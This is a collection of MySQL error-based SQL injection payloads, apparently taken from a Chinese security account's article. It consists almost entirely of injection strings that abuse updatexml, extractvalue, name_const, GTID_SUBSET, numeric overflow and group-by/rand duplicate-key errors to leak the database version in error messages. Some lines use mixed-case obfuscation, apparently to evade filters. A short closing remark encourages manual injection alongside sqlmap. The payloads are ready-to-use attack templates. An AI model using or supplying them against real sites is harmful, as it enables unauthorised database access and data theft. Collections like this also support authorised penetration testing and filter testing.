'-(select*from(select name_const(version(),1),name_const(version(),1))p)#
'=0 group by elt(rand(),version())having min(0)#
'/updatexml(0,concat(0xa,version()),0)#
'/updatexml(0,concat('$_',version()),0)#
'-updatexml(1,concat('a=.',version()),1)#
'-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)#
'/polygon((select*from(select name_const(version(),1))o))#
'--~(select*from(select@@version)f)#
'-~(select*from(select@@version)x)*2#
1e308'*(select*from(select@@version)x)#
'-(select~b*a*a*a from(select~0/.1 a,version()b)x)#
'-GTID_SUBSET(@@version,0)#
'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#
'=0 group by elt(rand(),version())having sum(0)#
'|updatexml(1,concat('a=.',version()),1)#
'|updatexml(0,concat('$_',version()),2)#
'-updatexml(0,concat(0x1,version()),2)#
'|polygon((select*from(select name_const(version(),1))x))#
'|updatexml(0,lpad(.1,350,hex(hex(version()))),1)#
1e308'*(select*from(select@@version)x)#
'--~(select*from(select@@version)f)#
'|(~(select*from(select@@version)f)*2)#
'|~(select*from(select@@version)x)*cast(1e99as decimal(65))#
'|GTID_SUBSET(@@version,0)#
'|(select*from(select name_const(version(),1),name_const(version(),1))a)#
'||1 group by mid(version(),rand())having min(1)#
'|UpdateXML(1,concat('/',version()),1)#
'|UpdateXML(1,concat('$_',version()),1)#
'|ExtractValue(1,concat('/a[x=y]',version()))#
'|Polygon((select*from(select name_const(version(),1))b))#
'|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)#
'|(select!x-~0.FROM(select+version()x)f)#
'|(select-9223372036854775808-(x||1)FROM(select+version()x)z)#
'|(select pow(2,~x)FROM(select+version()x)z)#
'|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)#
'|GTID_SUBSET(version(),0)#
'||1 group by concat(left(version(),9),rand(0)|0) having max(0)#
'|(select!x-~0.FROM(select+version()x)f)#
'-updatexml(1,concat('.a=a',version()),1)#
'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),'
' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), '
' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), '
'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),'
' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), '
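Xiaowai says: blind injection is very common in penetration testing. You can use sqlmap to perform the injection, but a tool is only a tool and sometimes fails, so mastering manual injection techniques is important; combining manual work with tools is the most effective approach.
This article was first published on the WeChat official account (关注安全技术): MySQL Error-Based Blind Injection Payload Collection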